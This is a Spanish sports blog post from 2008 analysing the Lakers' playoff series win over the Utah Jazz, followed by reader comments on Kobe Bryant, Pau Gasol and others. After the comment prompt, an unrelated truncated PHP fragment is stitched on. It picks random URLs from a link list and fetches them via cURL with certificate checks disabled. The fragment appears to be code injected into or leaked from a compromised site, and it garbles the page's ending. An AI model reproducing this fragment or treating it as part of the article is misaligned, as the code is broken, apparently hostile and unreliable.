ANÁLISIS: LAKERS 4 – JAZZ 2

19 de May de 2008 por TheDeerHunter

Finalmente, los Lakers han logrado superar con nota el difícil escollo con el que se habían topado. Todo el mundo podía intuir a priori el nivel de dificultad que les podía suponer esta eliminatoria. Sonaban incluso voces que consideraban a Utah como uno de los tapados del oeste y, con el punto de madurez que han alcanzado, apostaban por ellos incluso para la final. Nosotros, antes de comenzar, tratamos de analizar lo que podían ser las claves de esta eliminatoria. No sé si unos y otros, sin embargo, podíamos preveer el altísimo nivel que ambos equipos han llegado a desplegar y el gran espectáculo que hemos podido disfrutar.

No hacía falta ser Nostradamus, ni el analista baloncestístico más avispado del mundo para ser capaz de anticipar que todo iba a girar en torno a Kobe Bryant. Él sería la principal clave de cualquier eliminatoria en la que participara. Por experiencia y talento, sin duda, el actual mejor jugador que existe. En estos playoffs está sencillamente sublime, superando ampliamente los registros que le han llevado hasta el MVP. Sólo durante esta serie ha promediado 33 puntos por partido con casi un 50% de acierto, 7 rebotes y 7 asistencias… sencillamente letal.

Pero estos números no alcanzan a reflejar la naturaleza de su hazaña personal. Utah le ha defendido bien, por momentos muy bien y los problemas físicos han puesto en serios aprietos a L.A. A pesar de todo, Kobe ha prevalecido por encima. Cada día que pasa, cada partido que juega es mejor jugador. Más leyenda.

Por parte de Utah, la principal contramedida que han tratado de poner en práctica contra la estrella rival ha sido Kirilenko. El ruso es un jugador extraordinario, que por necesidades del equipo sacrifica su talento concentrándose en la defensa. Como defensor es exquisito: Limpio, elegante, heredero directo de maneras de las antiguas dinastías rusas. Con sus brazos infinitos trata siempre de llegar al robo, al tapón, a la anticipación. En toda la eliminatoria ningún mal gesto, ni un mal golpe. Solamente inteligencia y pundonor. Ha podido llevar a Kobe al límite de sus fuerzas, pero no ha sido suficiente. El 24 ahora mismo es superlativo. Sloan haría bien de encontrar la manera de mantener a K-47 contento en el equipo, involucrándolo quizás algo más en ataque.

Deron Williams era la otra clave prevista. Ha respondido con creces al reto y ha jugado como los grandes. En teoría a los equipos de Jackson suelen hacerles daño los bases de talento y él rezuma talento en cada una de sus acciones. Pero no sólo eso sino también casta y mucha mala leche. Ha hecho una eliminatoria que para si hubiera querido el legendario Stockton y ha logrado poner en jaque a sus rivales. En los Lakers ha sido Fisher exclusivamente el encargado de minimizarlo y el ex de Utah también ha hecho un trabajo sobresaliente. Nadie podía imaginar que volvía a su primer equipo para ser decisivo. En esta serie lo ha sido, sin lugar a dudas y de no ser por él bien podríamos estar hablando de otro resultado. Jordan Farmar, quien estaba llamado a discutirle el puesto sencillamente se ha borrado. Mucho tiene que aprender del viejo Fisher.

En el duelo interior, la gran decepción ha sido Boozer, que ha hecho una serie muy discreta. El venirse abajo o no en los momentos decisivos separa los buenos jugadores de los grandes y él ya empieza a ser sospechoso. Su tendencia a cometer faltas, muchas de ellas innecesarias, y su baja efectividad han sido claves en el sentido negativo para su equipo. Okur ha estado bien pero ha ido de más a menos. Phil Jackson ha ido paulatinamente ajustando la defensa sobre él y al final todo se limitaba a tiros exterioriores puntuales y a una defensa agresiva sobre Gasol. Insuficiente bagaje final para una pareja interior que se presentaban como amenaza seria. Por parte de Lakers Odom y Gasol han sufrido mucho, pero han terminado prevaleciendo. Ambos parece que han crecido como jugadores estos últimos días y, aunque se han mostrado irregulares por momentos, sus aportaciones han sido constantes y decisivas, sobre todo a la hora de afrontar los problemas físicos de su líder. Hacen una pareja sensacional y van mejorando conforme avanzan los playoffs.

Del resto, la intendencia de Utah ha ganado globalmente la batalla a la de Lakers. Brewer, Millsap, Harpring y Korver han aportado más y mejor que Radmanovic, Farmar, Vujacic, Walton y Turiaf. Los amarillos necesitarán mucho más de estos hombres a la hora de afrontar la terrible final de conferencia que se les avecina. Radmanovic, parece que está reaccionando levemente y Vujacic ha dado pinceladas de gran talento, estando en cancha en los mejores momentos de juego de L.A. Sólo le queda ser más constante. De Farmar, Walton y Turiaf, por supuesto, se espera más de lo que han dado. Margen de mejora tienen, suponemos.

La eliminatoria ha sido preciosa, con todos los ingredientes posibles para ser recordada durante mucho tiempo. Utah ha logrado por momentos poner a Lakers contra las cuerdas y ellos han tenido que sacar su mejor cara para superarlos, sobre todo (novedad) defensivamente hablando. Utah ha caído sí, pero lo ha hecho con la cabeza bien alta, con la imagen de gran equipo que tiene que seguir dando guerra en el futuro, con cualidades suficientes para ser incluso, ¿porqué no?, campeones.

Comenta

14 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Bonita eliminatoria, más aún comparándola con el resto de las semis de conferencia. Kobe y Deron han estado un nivel estratosférico. D-Williams es maravilloso y ha hecho todo lo posible para que los Jazz tuviesen opciones. Sólo le faltó meter ese triple en el sexto, pero eso habría sido pasarse, jeje. Para completar mi opinión sobre los Jazz… lamentable Boozer. Tuvo un partido bueno y para de contar. Malos porcentajes, superado en defensa, obsesionado en ocasiones en hacer la jugada individual, muy mal. Okur ha estado mejor, con la irregularidad que le caracteriza pero cumpliendo. Kirilenko ha estado bien, aunque le ha faltado asumir un poco de protagonismo ofensivo en algún momento. Pero ha sido regular, ha anotado en dobles dígitos siempre y ha hecho un gran trabajo defensivo fuese quien fuese su asignación.

    Para Lakers, gigantesco Bryant. La prórroga del cuarto fue una fea mancha pero por lo demás ha estado increíble. Su aportación aumenta siempre que la situación lo requiere, y ante los Jazz lo requería. Sobre Pau, creo que esta serie le ha servido para aprender lo que son los Playoffs de la NBA. En general, salvo su desastroso tercer partido, ha estado muy bien. Pero su actitud ha ido mejorando y ese batacazo en el tercero fue un punto de inflexión. Se le ha visto más intenso, menos quejica e incluso ha resultado desequilibrante en defensa: ¡aleluya!

    Odom ha cumplido con creces, y también se ha adaptado a lo que la eliminatoria exigía: agresividad en ataque. Y Fisher… no tengo palabras. Está siempre cuando se le necesita. Roba balones y anota triples en momentos decisivos. Si en el 97 me dicen que aquel zurdo que no la metía en el arco iris iba a ser un especialista del clutch, me meo de la risa.

    Si el banquillo es capaz de mejorar (lástima la enfermedad de Luke cuando mejor estaba) aspiramos a todo. Sería fantástico que Ariza llegue en condiciones, aunque lo dudo.

      Citar

  2. TheDeerHunter dice:
    #2

    Según leí por ahí creo que Tito Phil insinuó que Ariza juega en la misma posición que Radmanovic… y que por lo tanto al equipo le iba a venir de P.M. que volviera.

    Al parecer el bueno de Radma, tomó buena nota… porque desde que lo leí curiosamente ha estado mejor.

      Citar

  3. Red dice:
    #3

    Enfermedad de Luke?

      Citar

  4. Viva_Dirk dice:
    #4

    Para mi el salto de calidad lo ha dado Odom, tanto en ataque como en defensa. Es que ha hecho lo que se le reclamaba los años anteriores, acercandose a los 20 puntos por encuentro, con casi 12 rebotes, excelentes porcentajes y 2 tapones por noche, con el a este nivel somos mas temibles aun.

    Pau ha estado bien, ha defendido muy bien a Boozer y fue decisivo en el 5º, además de su habitual facilidad de cara al aro. A ver si deja de fallar tiros libres porque en lo demás está cumpliendo.

      Citar

  5. Gallis dice:
    #5

    Ufff, esto tiene pinta de convertirse en un clásico, si es que un Jazz-Lakers no lo es de por sí, jeje. Menudo espectaculo nos han dado ambos equipos. Sensacional!

    Por añadir algo que no se haya dicho, a Vujacic le faltan 4 sopas en defensa, pero es ataque está creciendo de una forma espectacular. Por favor, si hasta se atrevió a penetrar…en Utah, en un sexto partido!!! Me encanta “il fratello”!!!

    Por cierto, estaría bien que Turiaf hiciera algo y tal, jeje…

      Citar

  6. MagicJohnson32 dice:
    #6

    No, lo que estaría bien es que Turiaf no hiciese nada porque no jugase, o jugase 5 minutos para repartir un poco de leña y punto.

    Ah, sí, Vujacic, vaya gran sexto que se marcó después de un 5º lamentable, tremendísimas sus dos entradas a canasta. Hasta le forzó una falta en ataque a Millsap, que contaba Sasha que en el vestuario todos se canchondeaban diciendo que qué gran momento para forzar su primera falta de ataque de la temporada, jeje.

      Citar

  7. Viva_Dirk dice:
    #7

    Una cosa que se me olvidaba, por mucho que en casi cada vez que Deer habla de los Lakers diga ‘sin duda, el actual mejor jugador que existe’ refiriendose a Kobe, aunque no contestemos, los que no creemos que eso sea así seguimos sin creerlo.

      Citar

  8. TheDeerHunter dice:
    #8

    Apuntado queda, VDirk… mandaré a mis sicarios para que te lo hagan comprender…

      Citar

  9. MagicJohnson32 dice:
    #9

    Es que Viva siempre ha preferido a Iverson…

      Citar

  10. Gallis dice:
    #10

    Bueno, Viva, no sabía que supieras lo que piensan todos los que antes no pensaban eso, jeje…digamos que tu sigues sin pensarlo, jeje.

      Citar

  11. Viva_Dirk dice:
    #11

    Digamos que he oido a Mordaunt(aquí Jabho) seguir diciendo que Lebron es para él es el mas determinante, otros que prefieren el pragmatismo de Tim Duncan y otras variantes.

    Solo era para que quedase claro, que aunque no contestemos cada vez que se diga seguimos sin compartirlo.

      Citar

  12. MagicJohnson32 dice:
    #12

    Y tú que prefieres a Iverson, que no te dé vergüenza decirlo, hombre.

      Citar

  13. Gallis dice:
    #13

    Y digamos que cuando mordaunt sigue diciendo que Lebron es para él el más determinante, cuando otros dicen que prefieren el pragmatismo de Tim Duncan y otros (como es, imagino, tu caso) dicen que prefieren otras variantes, muchas personas, aunque no os contestemos cada vez que se diga, seguimos sin compartirlo…

    Creo que es evidente que cada uno habla, única y exclusivamente, en su nombre, jeje. 😛

      Citar

  14. Viva_Dirk dice:
    #14

    Si, yo sin duda prefiero a Nowitzki. Iverson….escalofrios me entran, jeje.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>